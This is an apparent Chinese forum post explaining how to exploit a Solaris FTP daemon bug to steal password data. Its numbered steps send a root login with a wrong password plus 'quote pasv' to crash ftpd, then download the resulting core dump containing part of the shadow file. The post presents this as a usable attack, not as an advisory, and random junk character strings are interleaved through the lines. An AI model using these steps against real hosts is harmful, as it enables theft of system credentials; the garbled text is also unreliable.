該方法利用了Solaris 操作系統(tǒng)中FTPD的一個(gè)BUG�,使得用戶可以獲得該機(jī)的口令文件���。具體過程如下:
; K- [: e6 `) ]' Y; Q& T; F( E. ~2 L) S8 X& d
1.通過 ftp 正常登錄到目的主機(jī)上; o) ~7 P. K1 ~; c! ~
" O, }8 F$ ]4 U; x
2.輸入如下命令序列:$ W. n% Q0 c6 X9 Y$ Z; O
2 g- [& o0 K8 N$ h
ftp> user root wrongpasswd
6 K& t6 N' f3 O/ w% _7 I7 o# y0 t; y d
: _! W4 [- L1 tftp> quote pasv7 ~% D+ d9 p. A1 W# N! d
& L) N X8 ~% c0 }9 j/ K) m0 b* B
3.這時(shí),ftpd會(huì)報(bào)錯(cuò)退出��,同時(shí)會(huì)在當(dāng)前目錄下生成一個(gè)core�����,口令文件就包含在這個(gè)core中�����。* `. H: d" I- ~/ Z/ v K
- k4 b' y' e* g9 U& m' u
4.再次進(jìn)入FTP >get core L9 `$ d2 P- T+ ~: j" z+ |& N0 H5 I2 ^
) F5 k7 {- G5 G& a1 r
補(bǔ)充:雖然在core只有一部分shadow�����,但是對于系統(tǒng)來說已經(jīng)是致命的打擊了
' D+ J1 b! x- b v, z% v2 h) ]. |: r2 G, y. E! J* K4 l
|
|本地廣告聯(lián)系: QQ:905790666 TEL:13176190456|Archiver|手機(jī)版|小黑屋|汶上信息港
( 魯ICP備19052200號(hào)-1 )
發(fā)表于 2011-1-12 21:01:38
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡